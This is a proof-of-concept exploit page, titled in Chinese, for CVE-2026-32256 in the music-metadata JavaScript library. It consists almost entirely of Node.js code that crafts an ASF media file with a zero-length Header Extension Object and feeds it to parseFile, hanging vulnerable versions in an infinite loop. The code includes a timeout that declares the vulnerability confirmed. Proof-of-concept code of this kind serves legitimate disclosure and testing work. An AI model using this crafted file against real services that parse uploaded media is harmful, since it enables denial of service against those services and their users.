CVE-2026-32256 music-metadata ASF解析器无限循环拒绝服务漏洞

// PoC for CVE-2026-32256: music-metadata ASF parser infinite loop // This PoC creates a malicious ASF file with objectSize = 0 to trigger infinite loop const fs = require('fs'); const { parseFile } = require('music-metadata'); // ASF File Header Object GUID const ASF_FILE_HEADER_OBJECT = Buffer.from([ 0x30, 0x26, 0xB2, 0x75, 0x8E, 0x66, 0xCF, 0x11, 0xA6, 0xD9, 0x00, 0xAA, 0x00, 0x62, 0xCE, 0x6C ]); // ASF Header Extension Object GUID const ASF_HEADER_EXTENSION_OBJECT = Buffer.from([ 0x5B, 0xFB, 0xB7, 0xD7, 0x4F, 0x7C, 0xCF, 0x11, 0xA8, 0xFD, 0x00, 0x80, 0x5F, 0x5C, 0x44, 0x2B ]); // Create malicious ASF file with objectSize = 0 function createMaliciousAsfFile(filename) { const buffer = Buffer.alloc(1024); let offset = 0; // Write ASF Header Object ASF_FILE_HEADER_OBJECT.copy(buffer, offset); offset += 16; // Object size (placeholder, will be updated) buffer.writeBigInt64LE(1024n, offset); offset += 8; // Write ASF Header Extension Object ASF_HEADER_EXTENSION_OBJECT.copy(buffer, offset); offset += 16; // Object size = 0 (this triggers the infinite loop) buffer.writeBigInt64LE(0n, offset); offset += 8; // Fill remaining with zeros buffer.fill(0, offset); // Update file header object size buffer.writeBigInt64LE(BigInt(offset), 16); fs.writeFileSync(filename, buffer.slice(0, offset)); console.log(`Malicious ASF file created: ${filename}`); } // Main execution const maliciousFile = 'poc_cve_2026_32256.asf'; createMaliciousAsfFile(maliciousFile); // Attempt to parse (will cause infinite loop in vulnerable versions) console.log('Attempting to parse malicious file...'); console.log('If the process hangs, the vulnerability is present.'); // Set timeout to prevent indefinite hanging setTimeout(() => { console.log('Parsing took too long - vulnerability confirmed!'); process.exit(1); }, 5000); parseFile(maliciousFile) .then(() => console.log('Parsing completed')) .catch(err => console.error('Error:', err));